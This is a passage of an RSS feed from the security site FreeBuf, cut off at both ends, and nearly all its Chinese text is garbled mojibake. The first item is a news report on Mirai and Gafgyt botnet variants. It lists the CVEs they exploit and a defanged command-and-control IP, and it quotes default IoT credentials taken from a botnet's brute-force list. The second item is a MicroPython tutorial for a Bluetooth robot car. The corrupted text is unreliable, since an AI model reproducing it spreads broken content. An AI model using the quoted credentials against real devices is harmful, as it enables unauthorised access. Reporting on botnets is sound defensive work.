”ç©¶æŠ¥å‘Šæˆ‘ä»¬å¯ä»¥çœ‹åˆ°ï¼Œåœ¨2016å¹´9月份,全çƒèŒƒå›´å†…å·²å‘现的感染了Bashliteæ¶æ„软件的设备数é‡å°±é«˜è¾¾æ•°ç™¾ä¸‡å°ã€‚ PaloAltoNetwork在其å‘å¸ƒçš„åˆ†æžæŠ¥å‘Šä¸æŒ‡å‡ºï¼šâ€œæˆªæ¢è‡³2018å¹´5月底,网络上已ç»å‡ºçŽ°äº†ä¸‰æ¬¾åŸºäºŽMiraiå’ŒGafgytæ¶æ„软件家æ—çš„æ¶æ„软件å˜ç§æºç äº†ï¼Œè¿™äº›æ¶æ„软件å˜ç§çš„æºä»£ç 被直接公布在了互è”网ä¸ï¼Œä»»ä½•人都å¯ä»¥éšæ„获å–并基于它们进行自定义开å‘,其ä¸çš„æ¼æ´žåˆ©ç”¨ä»£ç æ¶‰åŠåˆ°äº†å¤šä¸ªèƒ½å¤Ÿå½±å“物è”ç½‘è®¾å¤‡å®‰å…¨æ€§çš„å·²çŸ¥æ¼æ´žã€‚æ ¹æ®æˆ‘ä»¬å¯¹æ¶æ„软件å˜ç§æ ·æœ¬çš„分æžï¼Œæˆ‘们å‘现一个简å•çš„æ¶æ„软件å˜ç§å°±èƒ½å¤Ÿä¸€æ¬¡æ€§åˆ©ç”¨å¤šè¾¾11ä¸ªå®‰å…¨æ¼æ´žæ¥å®žæ–½æ”»å‡»ã€‚与之相比,就连è‡åæ˜è‘—çš„ IoTReaperæ¶æ„è½¯ä»¶ï¼ˆè¯¥æ¶æ„è½¯ä»¶åŒæ ·å€Ÿé‰´äº†Miraiçš„æºä»£ç ,但是它还集æˆäº†LUA环境,并自带有ä¹å¥—æ¼æ´žåˆ©ç”¨ä»£ç )都“黯然失色â€äº†ã€‚†这两款僵尸网络å˜ç§çš„æœ€æ–°ç‰ˆæœ¬èƒ½å¤Ÿåˆ©ç”¨D-Link DSL-2750B设备的OSå‘½ä»¤æ³¨å…¥æ¼æ´žï¼Œå¹¶ä¸”还集æˆäº†å¤šä¸ªæœ€æ–°çš„Metasploit模å—。 安全专家表示,这两个僵尸网络活动近期çªç„¶å˜å¾—éžå¸¸æ´»è·ƒï¼Œä»–们推测这两者之间å¯èƒ½ä¼šæœ‰æŸç§å…³è”,很å¯èƒ½æ˜¯åŒä¸€æ”»å‡»ç»„织所为。 ç ”ç©¶äººå‘˜æ‰€å‘çŽ°çš„ç¬¬ä¸€ä¸ªæ¶æ„活动与Omni僵尸网络(Miraiæ¶æ„软件的最新å˜ç§ä¹‹ä¸€ï¼‰æœ‰å…³ã€‚Omni僵尸网络å¯åˆ©ç”¨çš„å®‰å…¨æ¼æ´žèŒƒå›´éžå¸¸å¹¿ï¼Œä¾‹å¦‚DasanGPONè·¯ç”±å™¨çš„æ¼æ´žCVE-2018-10561å’ŒCVE-2018-1562,åŽä¸ºè·¯ç”±å™¨çš„æ¼æ´žCVE-2017–17215,D-Linkè®¾å¤‡çš„ä¸¤ä¸ªå‘½ä»¤æ‰§è¡Œæ¼æ´žï¼ŒVacron NVRè®¾å¤‡çš„ç›¸å…³å®‰å…¨æ¼æ´žï¼ŒJAWS WebæœåŠ¡å™¨çš„å‘½ä»¤æ‰§è¡Œæ¼æ´žï¼Œä»¥åŠè¶…过70家厂商的CCTVå’ŒDVRè®¾å¤‡æ¼æ´žç‰ç‰ã€‚ PaloAltoçš„ç ”ç©¶äººå‘˜è¡¨ç¤ºï¼Œæ‰€æœ‰çš„è¿™äº›æ¼æ´žéƒ½æ˜¯å·²çŸ¥æ¼æ´žï¼Œå¹¶ä¸”å·²ç»æœ‰å¾ˆå¤šåƒµå°¸ç½‘络æ£åœ¨åˆ©ç”¨è¿™äº›æ¼æ´žå®žæ–½æ”»å‡»ï¼Œä½†è¿™ä¹Ÿæ˜¯ç¬¬ä¸€æ¬¡æœ‰Miraiå˜ç§ä¸€æ¬¡æ€§åˆ©ç”¨è¿™åä¸€ä¸ªæ¼æ´žæ¥å®žæ–½æ”»å‡»ã€‚ 最åŽä¸€ä¸ªMiraiå˜ç§ä½¿ç”¨äº†IP地å€213[.]183.53.120æ¥æ‰˜ç®¡Payload,并将其作为命令控制æœåŠ¡å™¨ï¼Œè€ŒæŸäº›Gafgytæ ·æœ¬åŒæ ·ä¹Ÿä½¿ç”¨çš„æ˜¯è¿™ä¸ªIP地å€ã€‚ ç ”ç©¶äººå‘˜æ‰€è§‚å¯Ÿåˆ°çš„ç¬¬äºŒä¸ªæ¶æ„活动使用的是跟之å‰ç›¸åŒçš„æ¼æ´žåˆ©ç”¨æœºåˆ¶ï¼Œä½†å®ƒè¿˜ä¼šé¢å¤–进行å‡è¯çˆ†ç ´æ”»å‡»ã€‚ç ”ç©¶äººå‘˜æ ¹æ®è¯¥æ´»åŠ¨æ‰€ä½¿ç”¨çš„Shell脚本以åŠç›¸å…³ä»£ç å称,将该活动命å为了Okane。 ç ”ç©¶äººå‘˜è¡¨ç¤ºï¼Œè·Ÿä¹‹å‰çš„æ¶æ„æ´»åЍä¸åŒçš„æ˜¯ï¼Œè¿™äº›æ ·æœ¬è¿˜ä¼šè¿›è¡Œå‡è¯æš´åŠ›ç ´è§£æ”»å‡»ï¼Œè€Œçˆ†ç ´åˆ—è¡¨ä¸ä¹Ÿæœ‰ä¸€äº›ä¸å¸¸è§çš„æ¡ç›®ï¼Œæ¯”å¦‚è¯´ï¼š root/t0talc0ntr0l4!– Control4设备的默认å‡è¯ admin/adc123– ADCFlexWave Prism设备的默认å‡è¯ mg3500/merlin– Camtron IP æ‘„åƒå¤´è®¾å¤‡çš„默认å‡è¯ 该活动ä¸çš„æŸäº›æ ·æœ¬è¿˜åœ¨Miraiæºç 䏿·»åŠ äº†ä¸¤ä¸ªé¢å¤–çš„DDoS功能。 é™¤äº†ä¸Šè¿°ä¸¤ä¸ªæ¶æ„活动之外,PaloAlto Networksçš„ç ”ç©¶äººå‘˜è¿˜å‘现了第三个僵尸网络活动,å为Hakai,该僵尸网络会å°è¯•利用之å‰ä»‹ç»çš„æ¼æ´žåˆ©ç”¨ä»£ç æ¥è®©ç›®æ ‡è®¾å¤‡æ„ŸæŸ“Gafgytæ¶æ„软件。 PaloAltoNetworksæŒ‡å‡ºï¼Œè¿™ä¸€æ³¢æ–°çš„ç½‘ç»œæ”»å‡»æ´»åŠ¨è¯æ˜Žäº†æ”»å‡»è€…构建大型僵尸网络的能力æ£åœ¨å˜å¾—è¶Šæ¥è¶Šå¼ºï¼Œéšç€å„ç§åƒµå°¸ç½‘络å˜ç§æºç 泄露在互è”网上,之åŽè¿˜ä¼šå‡ºçŽ°æ›´å¤šä¸åŒç±»åž‹ä¸”ç ´å力更强的僵尸网络攻击。除æ¤ä¹‹å¤–,å„大厂商也应该æå‡æ¼æ´žè¡¥ä¸çš„开呿•ˆçŽ‡ï¼Œå°½å¯èƒ½åœ°ä¿æŠ¤ç”¨æˆ·çš„ç»ˆç«¯åŠæ•°æ®å®‰å…¨ã€‚ *å‚è€ƒæ¥æºï¼šsecurityaffairs,FBå°ç¼–Alpha_h4ck编译,转载请注明æ¥è‡ªFreeBuf.COM]]></description>
392 <content:encoded><![CDATA[<p><b style="color: rgb(0, 176, 80);">安全专家è¦å‘Šç§°ï¼Œå¹¿å¤§ç”¨æˆ·è¿‘期应该å°å¿ƒ<a href="https://securityaffairs.co/wordpress/50929/cyber-crime/linux-mirai-elf.html" ref="">Mirai</a>å’Œ<a href="https://securityaffairs.co/wordpress/45820/cyber-crime/linux-remaiten-iot-botnet.html">Gafgyt</a>åƒµå°¸ç½‘ç»œäº†ï¼Œå› ä¸ºè¿™ä¸¤ä¸ªè‡åæ˜è‘—的物è”网僵尸网络åˆå¼€å§‹æ´»è·ƒäº†èµ·æ¥ã€‚</b></p>
393<p><img alt="1.png" src="http://image.3001.net/images/20180726/15325701493248.png!small" width="600" height="400"></p>
394<p>å®‰å…¨ä¸“å®¶é€šè¿‡ç ”ç©¶å‘现,Miraiå’ŒGafgyt这两个僵尸网络近期ååˆ†æ´»è·ƒï¼Œä¸æŽ’é™¤æ”»å‡»è€…è®¡åˆ’è¿›è¡Œæ–°ä¸€è½®å¤§è§„æ¨¡ç½‘ç»œæ”»å‡»çš„å¯èƒ½æ€§ã€‚由于Mirai僵尸网络的æºä»£ç æ¤å‰å·²æ³„露在网络上,紧跟ç€çš„就是å„ç§Miraiå˜ç§å¼€å§‹æ³›æ»¥äºŽâ€œæ±Ÿæ¹–â€ã€‚仅在2018年,就已ç»å‡ºçŽ°äº†ç±»ä¼¼<a href="https://securityaffairs.co/wordpress/73599/cyber-crime/satori-botnet-resurrection.html">Satori</a>ã€<a href="https://securityaffairs.co/wordpress/68153/cyber-crime/masuta-botnet.html">Masuta</a>ã€<a href="https://securityaffairs.co/wordpress/72640/cyber-crime/wicked-mirai.html">WickedMirai</a>〠<a href="https://securityaffairs.co/wordpress/68610/cyber-crime/jenx-botnet.html">JenX</a>ã€Omniå’Œ<a href="https://securityaffairs.co/wordpress/69449/cyber-crime/omg-botnet.html">OMG</a>ç‰å¤šæ¬¾Mirai僵尸网络å˜ç§ã€‚</p>
395<p>Gafgyt僵尸网络,åˆå<a href="https://securityaffairs.co/wordpress/50824/malware/bashlite-botnets.html">Bashlite</a>或<a href="https://securityaffairs.co/wordpress/52845/cyber-crime/linuxirctelnet-malware.html">Lizkebab</a>,该僵尸网络首次出现于2014年,其æºä»£ç 泄露于2015å¹´åˆã€‚æ ¹æ®Flashpointçš„ç ”ç©¶æŠ¥å‘Šæˆ‘ä»¬å¯ä»¥çœ‹åˆ°ï¼Œåœ¨2016å¹´9月份,全çƒèŒƒå›´å†…å·²å‘现的感染了Bashliteæ¶æ„软件的设备数é‡å°±é«˜è¾¾æ•°ç™¾ä¸‡å°ã€‚</p>
396<p>PaloAltoNetwork在其å‘å¸ƒçš„åˆ†æžæŠ¥å‘Šä¸æŒ‡å‡ºï¼šâ€œæˆªæ¢è‡³2018å¹´5月底,网络上已ç»å‡ºçŽ°äº†ä¸‰æ¬¾åŸºäºŽMiraiå’ŒGafgytæ¶æ„软件家æ—çš„æ¶æ„软件å˜ç§æºç äº†ï¼Œè¿™äº›æ¶æ„软件å˜ç§çš„æºä»£ç 被直接公布在了互è”网ä¸ï¼Œä»»ä½•人都å¯ä»¥éšæ„获å–并基于它们进行自定义开å‘,其ä¸çš„æ¼æ´žåˆ©ç”¨ä»£ç æ¶‰åŠåˆ°äº†å¤šä¸ªèƒ½å¤Ÿå½±å“物è”ç½‘è®¾å¤‡å®‰å…¨æ€§çš„å·²çŸ¥æ¼æ´žã€‚æ ¹æ®æˆ‘ä»¬å¯¹æ¶æ„软件å˜ç§æ ·æœ¬çš„分æžï¼Œæˆ‘们å‘现一个简å•çš„æ¶æ„软件å˜ç§å°±èƒ½å¤Ÿä¸€æ¬¡æ€§åˆ©ç”¨å¤šè¾¾11ä¸ªå®‰å…¨æ¼æ´žæ¥å®žæ–½æ”»å‡»ã€‚与之相比,就连è‡åæ˜è‘—çš„ IoTReaperæ¶æ„è½¯ä»¶ï¼ˆè¯¥æ¶æ„è½¯ä»¶åŒæ ·å€Ÿé‰´äº†Miraiçš„æºä»£ç ,但是它还集æˆäº†LUA环境,并自带有ä¹å¥—æ¼æ´žåˆ©ç”¨ä»£ç )都“黯然失色â€äº†ã€‚â€</p>
397<p>这两款僵尸网络å˜ç§çš„æœ€æ–°ç‰ˆæœ¬èƒ½å¤Ÿåˆ©ç”¨D-Link DSL-2750B设备的OSå‘½ä»¤æ³¨å…¥æ¼æ´žï¼Œå¹¶ä¸”还集æˆäº†å¤šä¸ªæœ€æ–°çš„Metasploit模å—。</p>
398<p>安全专家表示,这两个僵尸网络活动近期çªç„¶å˜å¾—éžå¸¸æ´»è·ƒï¼Œä»–们推测这两者之间å¯èƒ½ä¼šæœ‰æŸç§å…³è”,很å¯èƒ½æ˜¯åŒä¸€æ”»å‡»ç»„织所为。</p>
399<p>ç ”ç©¶äººå‘˜æ‰€å‘çŽ°çš„ç¬¬ä¸€ä¸ªæ¶æ„活动与Omni僵尸网络(Miraiæ¶æ„软件的最新å˜ç§ä¹‹ä¸€ï¼‰æœ‰å…³ã€‚Omni僵尸网络å¯åˆ©ç”¨çš„å®‰å…¨æ¼æ´žèŒƒå›´éžå¸¸å¹¿ï¼Œä¾‹å¦‚DasanGPONè·¯ç”±å™¨çš„æ¼æ´žCVE-2018-10561å’ŒCVE-2018-1562,åŽä¸ºè·¯ç”±å™¨çš„æ¼æ´žCVE-2017–17215,D-Linkè®¾å¤‡çš„ä¸¤ä¸ªå‘½ä»¤æ‰§è¡Œæ¼æ´žï¼ŒVacron NVRè®¾å¤‡çš„ç›¸å…³å®‰å…¨æ¼æ´žï¼ŒJAWS WebæœåŠ¡å™¨çš„å‘½ä»¤æ‰§è¡Œæ¼æ´žï¼Œä»¥åŠè¶…过70家厂商的CCTVå’ŒDVRè®¾å¤‡æ¼æ´žç‰ç‰ã€‚</p>
400<p>PaloAltoçš„ç ”ç©¶äººå‘˜è¡¨ç¤ºï¼Œæ‰€æœ‰çš„è¿™äº›æ¼æ´žéƒ½æ˜¯å·²çŸ¥æ¼æ´žï¼Œå¹¶ä¸”å·²ç»æœ‰å¾ˆå¤šåƒµå°¸ç½‘络æ£åœ¨åˆ©ç”¨è¿™äº›æ¼æ´žå®žæ–½æ”»å‡»ï¼Œä½†è¿™ä¹Ÿæ˜¯ç¬¬ä¸€æ¬¡æœ‰Miraiå˜ç§ä¸€æ¬¡æ€§åˆ©ç”¨è¿™åä¸€ä¸ªæ¼æ´žæ¥å®žæ–½æ”»å‡»ã€‚</p>
401<p>最åŽä¸€ä¸ªMiraiå˜ç§ä½¿ç”¨äº†IP地å€213[.]183.53.120æ¥æ‰˜ç®¡Payload,并将其作为命令控制æœåŠ¡å™¨ï¼Œè€ŒæŸäº›Gafgytæ ·æœ¬åŒæ ·ä¹Ÿä½¿ç”¨çš„æ˜¯è¿™ä¸ªIP地å€ã€‚</p>
402<p>ç ”ç©¶äººå‘˜æ‰€è§‚å¯Ÿåˆ°çš„ç¬¬äºŒä¸ªæ¶æ„活动使用的是跟之å‰ç›¸åŒçš„æ¼æ´žåˆ©ç”¨æœºåˆ¶ï¼Œä½†å®ƒè¿˜ä¼šé¢å¤–进行å‡è¯çˆ†ç ´æ”»å‡»ã€‚ç ”ç©¶äººå‘˜æ ¹æ®è¯¥æ´»åŠ¨æ‰€ä½¿ç”¨çš„Shell脚本以åŠç›¸å…³ä»£ç å称,将该活动命å为了Okane。</p>
403<p>ç ”ç©¶äººå‘˜è¡¨ç¤ºï¼Œè·Ÿä¹‹å‰çš„æ¶æ„æ´»åЍä¸åŒçš„æ˜¯ï¼Œè¿™äº›æ ·æœ¬è¿˜ä¼šè¿›è¡Œå‡è¯æš´åŠ›ç ´è§£æ”»å‡»ï¼Œè€Œçˆ†ç ´åˆ—è¡¨ä¸ä¹Ÿæœ‰ä¸€äº›ä¸å¸¸è§çš„æ¡ç›®ï¼Œæ¯”å¦‚è¯´ï¼š</p>
404<blockquote><p>root/t0talc0ntr0l4!– Control4设备的默认å‡è¯</p>
405<p>admin/adc123– ADCFlexWave Prism设备的默认å‡è¯</p>
406<p>mg3500/merlin– Camtron IP æ‘„åƒå¤´è®¾å¤‡çš„默认å‡è¯</p>
407</blockquote>
408<p>该活动ä¸çš„æŸäº›æ ·æœ¬è¿˜åœ¨Miraiæºç 䏿·»åŠ äº†ä¸¤ä¸ªé¢å¤–çš„DDoS功能。</p>
409<p><img alt="2.png" src="http://image.3001.net/images/20180726/15325701649218.png!small" width="362" height="677"></p>
410<p>é™¤äº†ä¸Šè¿°ä¸¤ä¸ªæ¶æ„活动之外,PaloAlto Networksçš„ç ”ç©¶äººå‘˜è¿˜å‘现了第三个僵尸网络活动,å为Hakai,该僵尸网络会å°è¯•利用之å‰ä»‹ç»çš„æ¼æ´žåˆ©ç”¨ä»£ç æ¥è®©ç›®æ ‡è®¾å¤‡æ„ŸæŸ“Gafgytæ¶æ„软件。</p>
411<p>PaloAltoNetworksæŒ‡å‡ºï¼Œè¿™ä¸€æ³¢æ–°çš„ç½‘ç»œæ”»å‡»æ´»åŠ¨è¯æ˜Žäº†æ”»å‡»è€…构建大型僵尸网络的能力æ£åœ¨å˜å¾—è¶Šæ¥è¶Šå¼ºï¼Œéšç€å„ç§åƒµå°¸ç½‘络å˜ç§æºç 泄露在互è”网上,之åŽè¿˜ä¼šå‡ºçŽ°æ›´å¤šä¸åŒç±»åž‹ä¸”ç ´å力更强的僵尸网络攻击。除æ¤ä¹‹å¤–,å„大厂商也应该æå‡æ¼æ´žè¡¥ä¸çš„开呿•ˆçŽ‡ï¼Œå°½å¯èƒ½åœ°ä¿æŠ¤ç”¨æˆ·çš„ç»ˆç«¯åŠæ•°æ®å®‰å…¨ã€‚</p>
412<p><b style="color: rgb(159, 163, 168);">*å‚è€ƒæ¥æºï¼šsecurityaffairs,FBå°ç¼–Alpha_h4ck编译,转载请注明æ¥è‡ªFreeBuf.COM</b></p>
413]]></content:encoded>
414 <wfw:commentRss>http://www.freebuf.com/news/178824.html/feed</wfw:commentRss>
415 <slash:comments>0</slash:comments>
416 </item>
417 <item>
418 <title>TPYBoard之DIYä¸€ä¸ªæ— çº¿è£…ç”²å°è½¦</title>
419 <link>http://www.freebuf.com/geek/178005.html</link>
420 <comments>http://www.freebuf.com/geek/178005.html#comments</comments>
421 <pubDate>Thu, 26 Jul 2018 02:00:42 +0000</pubDate>
422 <dc:creator>_æ©™å ã‚</dc:creator>
423 <category><![CDATA[æžå®¢]]></category>
424 <category><![CDATA[tpyboard]]></category>
425 <category><![CDATA[æ— çº¿è£…ç”²å°è½¦]]></category>
426
427 <guid isPermaLink="false">http://www.freebuf.com/?p=178005</guid>
428 <description><![CDATA[智能å°è½¦ä½œä¸ºçŽ°ä»£çš„æ–°å‘æ˜Žï¼Œæ˜¯ä»¥åŽçš„å‘展方å‘,他å¯ä»¥æŒ‰ç…§é¢„先设定的模å¼åœ¨ä¸€ä¸ªçŽ¯å¢ƒé‡Œè‡ªåŠ¨çš„è¿ä½œï¼Œä¸éœ€è¦äººä¸ºçš„管ç†ï¼Œå¯åº”用于科å¦å‹˜æŽ¢ç‰ç‰çš„用途。智能å°è½¦èƒ½å¤Ÿå®žæ—¶æ˜¾ç¤ºæ—¶é—´ã€é€Ÿåº¦ã€é‡Œç¨‹ï¼Œå…·æœ‰è‡ªåŠ¨å¯»è¿¹ã€å¯»å…‰ã€é¿éšœåŠŸèƒ½ï¼Œå¯ç¨‹æŽ§è¡Œé©¶é€Ÿåº¦ã€å‡†ç¡®å®šä½åœè½¦ï¼Œè¿œç¨‹ä¼ 输图åƒç‰åŠŸèƒ½ã€‚ä¸‹é¢å¸¦å¤§å®¶åšä¸€ä¸ªæ™ºèƒ½è“牙å°è½¦ï¼Œç”¨æ‰‹æœºAPPæ¥æŽ§åˆ¶å°è½¦å‰è¿›ã€åŽé€€ã€å‘å·¦ã€å‘å³ã€åœæ¢ï¼Œæœ¬æ¬¡è“牙å°è½¦çš„设计在于探索è“牙智能å°è½¦çš„设计ç†å¿µåŠè®¾è®¡æ–¹æ³•,å¦ä¹ 一下PWMæŽ§åˆ¶ç”µæœºå·®é€Ÿæ¥æŽ§åˆ¶å°è½¦çš„æ–¹å‘,下é¢å°±åŠ¨æ‰‹æžèµ·æ¥å§ï¼ï¼ï¼ï¼ï¼ ä¸€ã€æ•ˆæžœå±•示 给大家上视频连接,å¯ä»¥è“牙控制,å¯ä»¥æ‰‹æŸ„控制哦ï¼ï¼ï¼ 看ä¸åˆ°ï¼Ÿç‚¹è¿™é‡Œ äºŒã€ææ–™å‡†å¤‡ TPYBoard  v102   1å— è“ç‰™ä¸²å£æ¨¡å—  1个 TPYBoard v102å°è½¦æ‰©å±•æ¿ï¼ˆåŒ…å«4个车轮,4个电机) 18650ç”µæ± 2节 æ•°æ®çº¿    1æ¡ æœé‚¦çº¿  è‹¥å¹² è“牙APP (http://old.tpyboard.com/download/tool/190.html) 三ã€è“ç‰™æ¨¡å— è“牙( Bluetoothï¼‰ï¼šæ˜¯ä¸€ç§æ— çº¿æŠ€æœ¯æ ‡å‡†ï¼Œå¯å®žçŽ°å›ºå®šè®¾å¤‡ã€ç§»åŠ¨è®¾å¤‡å’Œæ¥¼å®‡ä¸ªäººåŸŸç½‘ä¹‹é—´çš„çŸè·ç¦»æ•°æ®äº¤æ¢ï¼ˆä½¿ç”¨2.4—2.485GHzçš„ISM波段的UHFæ— çº¿ç”µæ³¢ï¼‰ã€‚ 我们在æ¤ä½¿ç”¨çš„è“牙模å—(HC-06)å·²ç»åœ¨å†…部实现了è“牙å议,ä¸ç”¨æˆ‘们å†åŽ»è‡ªå·±å¼€å‘调试å议。这类模å—一般都是借助于串å£åè®®é€šä¿¡ï¼Œå› æ¤æˆ‘们åªéœ€å€ŸåЩ䏲å£å°†æˆ‘们需è¦å‘é€çš„æ•°æ®å‘é€ç»™è“牙模å—,è“牙模å—会自动将数æ®é€šè¿‡è“牙åè®®å‘é€ç»™é…对好的è“牙设备。 å››ã€å•片机-TPYBoard v102 TPYBoard v102 是éµå¾ªMITå议,由TurnipSmartå…¬å¸åˆ¶ä½œçš„一款MicroPython开呿¿ï¼Œå®ƒåŸºäºŽSTM32F405å•片机,通过USB接å£è¿›è¡Œæ•°æ®ä¼ è¾“ã€‚è¯¥å¼€å‘æ¿å†…ç½®4个LEDç¯ã€ä¸€ä¸ªåŠ é€Ÿåº¦ä¼ æ„Ÿå™¨ï¼Œå¯åœ¨3V-10V之间的电压æ£å¸¸å·¥ä½œã€‚è®©ä½ ä¼šPythonå°±èƒ½åšæžå®¢, 用Python控制硬件,支æŒPythonè¯è¨€çš„开呿¿ã€‚æ¯”æ ‘èŽ“æ´¾æ›´å°å·§ï¼Œæ›´ç®€å•,更便宜,比Arduinoæ›´å¼ºå¤§ï¼Œæ›´åŠ å®¹æ˜“ç¼–ç¨‹ã€‚ 五ã€å°è½¦æ‰©å±•æ¿ ä»¥TPYBoard v102开呿¿ä¸ºä¸»æŽ§æ¿ï¼Œå°è½¦æ‰©å±•æ¿å…·æœ‰å››è·¯PWM调速电机ã€8ä¸ªå¯æŽ§LEDã€1个蜂鸣器ã€5路舵机接å£ã€1个è“牙接å£ã€1个PS2æ— çº¿æŽ¥å£ã€å¼•出TPYBoard v102开呿¿å…¨éƒ¨é’ˆè„šï¼Œå¯è£…载循迹模å—ã€è¶…声波模å—ã€æœºæ¢°æ‰‹è‡‚ã€çº¢å¤–接收头,兼容入门级电机和专业级电机,两节18650å•独供电。 å…ã€æºä»£ç 我们åªéœ€è¦æŠŠTPYBoard v102 æ’å°è½¦æ‰©å±•æ¿ä¸Šï¼ŒæŠŠè“ç‰™æ¨¡å—æ’上,把程åºå†™å…¥å°±è¡Œ,䏋颿˜¯main.pyæºç¨‹åº # main.py -- put your code here!from pyb import Pinfrom pyb import UART N1 = Pin('Y1', Pin.OUT_PP)N2 = Pin('Y2', Pin.OUT_PP)N3 = Pin('Y3', Pin.OUT_PP)N4 = Pin('Y4', Pin.OUT_PP)N5 = Pin('Y6', Pin.OUT_PP)N6 = Pin('Y7', Pin.OUT_PP)N7 = Pin('Y8', Pin.OUT_PP)N8 = Pin('Y9', Pin.OUT_PP) led_red=Pin('Y5', Pin.OUT_PP)led_right=Pin('Y12', Pin.OUT_PP)led_left=Pin('Y11', Pin.OUT_PP) led_red.value(1)led_right.value(0)led_left.value(0)  blue=UART(1,9600,timeout=100) def go(speed): M1_0=pyb.Timer(8, freq=10000).channel(1, pyb.Timer.PWM, pin=pyb.Pin.board.Y1, pulse_width=(speed*200)+10000) M1_1=pyb.Timer(8, freq=10000).channel(2, pyb.Timer.PWM, pin=pyb.Pin.board.Y2, pulse_width=0)  M2_0=pyb.Timer(4, freq=10000).channel(3, pyb.Timer.PWM, pin=pyb.Pin.board.Y3, pulse_width=(speed*100)+5000) M2_1=pyb.Timer(4, freq=10000).channel(4, pyb.Timer.PWM, pin=pyb.Pin.board.Y4, pulse_width=0)  M3_0=pyb.Timer(1, […]]]></description>
429 <content:encoded><![CDATA[<p><b style="color: rgb(121, 134, 203);"><img alt="å°è½¦.png" src="http://image.3001.net/images/20180719/15319694333730.png!small" width="690" height="372"></b><b style="color: rgb(0, 176, 80);">智能å°è½¦ä½œä¸ºçŽ°ä»£çš„æ–°å‘æ˜Žï¼Œæ˜¯ä»¥åŽçš„å‘展方å‘,他å¯ä»¥æŒ‰ç…§é¢„先设定的模å¼åœ¨ä¸€ä¸ªçŽ¯å¢ƒé‡Œè‡ªåŠ¨çš„è¿ä½œï¼Œä¸éœ€è¦äººä¸ºçš„管ç†ï¼Œå¯åº”用于科å¦å‹˜æŽ¢ç‰ç‰çš„用途。智能å°è½¦èƒ½å¤Ÿå®žæ—¶æ˜¾ç¤ºæ—¶é—´ã€é€Ÿåº¦ã€é‡Œç¨‹ï¼Œå…·æœ‰è‡ªåŠ¨å¯»è¿¹ã€å¯»å…‰ã€é¿éšœåŠŸèƒ½ï¼Œå¯ç¨‹æŽ§è¡Œé©¶é€Ÿåº¦ã€å‡†ç¡®å®šä½åœè½¦ï¼Œè¿œç¨‹ä¼ 输图åƒç‰åŠŸèƒ½ã€‚ä¸‹é¢å¸¦å¤§å®¶åšä¸€ä¸ªæ™ºèƒ½è“牙å°è½¦ï¼Œç”¨æ‰‹æœºAPPæ¥æŽ§åˆ¶å°è½¦å‰è¿›ã€åŽé€€ã€å‘å·¦ã€å‘å³ã€åœæ¢ï¼Œæœ¬æ¬¡è“牙å°è½¦çš„设计在于探索è“牙智能å°è½¦çš„设计ç†å¿µåŠè®¾è®¡æ–¹æ³•,å¦ä¹ 一下PWMæŽ§åˆ¶ç”µæœºå·®é€Ÿæ¥æŽ§åˆ¶å°è½¦çš„æ–¹å‘,下é¢å°±åŠ¨æ‰‹æžèµ·æ¥å§ï¼ï¼ï¼ï¼ï¼</b></p>
430<h2><b>ä¸€ã€æ•ˆæžœå±•示</b><b></b></h2>
431<p>给大家上视频连接,å¯ä»¥è“牙控制,å¯ä»¥æ‰‹æŸ„控制哦ï¼ï¼ï¼</p>
432<p style="text-align: center;"> <iframe frameborder="0" width="690" height="498" src="https://v.qq.com/iframe/player.html?vid=k0721or47dw&tiny=0&auto=0"></iframe></p>
433<p style="text-align: center;">看ä¸åˆ°ï¼Ÿç‚¹<a href="https://v.qq.com/x/page/k0721or47dw.html" target="_blank" ref="nofollow">这里</a></p>
434<h2><b>äºŒã€ææ–™å‡†å¤‡</b><b></b></h2>
435<blockquote><p>TPYBoard v102 1å—</p>
436<p>è“ç‰™ä¸²å£æ¨¡å— 1个</p>
437<p>TPYBoard v102å°è½¦æ‰©å±•æ¿ï¼ˆåŒ…å«4个车轮,4个电机)</p>
438<p>18650ç”µæ± 2节</p>
439<p>æ•°æ®çº¿ 1æ¡</p>
440<p>æœé‚¦çº¿ 若干</p>
441<p>è“牙APP (<a href="http://old.tpyboard.com/download/tool/190.html">http://old.tpyboard.com/download/tool/190.html</a>)</p>
442</blockquote>
443<h2><b>三ã€è“牙模å—</b><b></b></h2>
444<p><b>è“牙( Bluetooth):</b>æ˜¯ä¸€ç§æ— çº¿æŠ€æœ¯æ ‡å‡†ï¼Œå¯å®žçŽ°å›ºå®šè®¾å¤‡ã€ç§»åŠ¨è®¾å¤‡å’Œæ¥¼å®‡ä¸ªäººåŸŸç½‘ä¹‹é—´çš„çŸè·ç¦»æ•°æ®äº¤æ¢ï¼ˆä½¿ç”¨2.4—2.485GHzçš„ISM波段的UHFæ— çº¿ç”µæ³¢ï¼‰ã€‚</p>
445<p>我们在æ¤ä½¿ç”¨çš„è“牙模å—(HC-06)å·²ç»åœ¨å†…部实现了è“牙å议,ä¸ç”¨æˆ‘们å†åŽ»è‡ªå·±å¼€å‘调试å议。这类模å—一般都是借助于串å£åè®®é€šä¿¡ï¼Œå› æ¤æˆ‘们åªéœ€å€ŸåЩ䏲å£å°†æˆ‘们需è¦å‘é€çš„æ•°æ®å‘é€ç»™è“牙模å—,è“牙模å—会自动将数æ®é€šè¿‡è“牙åè®®å‘é€ç»™é…对好的è“牙设备。</p>
446<p> <img alt="TPYBoard之DIYä¸€ä¸ªæ— çº¿è£…ç”²å°è½¦" src="http://image.3001.net/images/20180719/1531968804638.png!small" width="399" height="364.9767441860465"></p>
447<h2><b>å››ã€å•片机-TPYBoard v102</b><b></b></h2>
448<p>TPYBoard v102 是éµå¾ªMITå议,由TurnipSmartå…¬å¸åˆ¶ä½œçš„一款MicroPython开呿¿ï¼Œå®ƒåŸºäºŽSTM32F405å•片机,通过USB接å£è¿›è¡Œæ•°æ®ä¼ è¾“ã€‚è¯¥å¼€å‘æ¿å†…ç½®4个LEDç¯ã€ä¸€ä¸ªåŠ é€Ÿåº¦ä¼ æ„Ÿå™¨ï¼Œå¯åœ¨3V-10V之间的电压æ£å¸¸å·¥ä½œã€‚è®©ä½ ä¼šPythonå°±èƒ½åšæžå®¢, 用Python控制硬件,支æŒPythonè¯è¨€çš„开呿¿ã€‚æ¯”æ ‘èŽ“æ´¾æ›´å°å·§ï¼Œæ›´ç®€å•,更便宜,比Arduinoæ›´å¼ºå¤§ï¼Œæ›´åŠ å®¹æ˜“ç¼–ç¨‹ã€‚</p>
449<p> <img alt="TPYBoard之DIYä¸€ä¸ªæ— çº¿è£…ç”²å°è½¦" src="http://image.3001.net/images/20180719/15319687975351.png!small" width="399" height="532.4784172661871"> </p>
450<h2>五ã€<b>å°è½¦æ‰©å±•æ¿</b><b></b></h2>
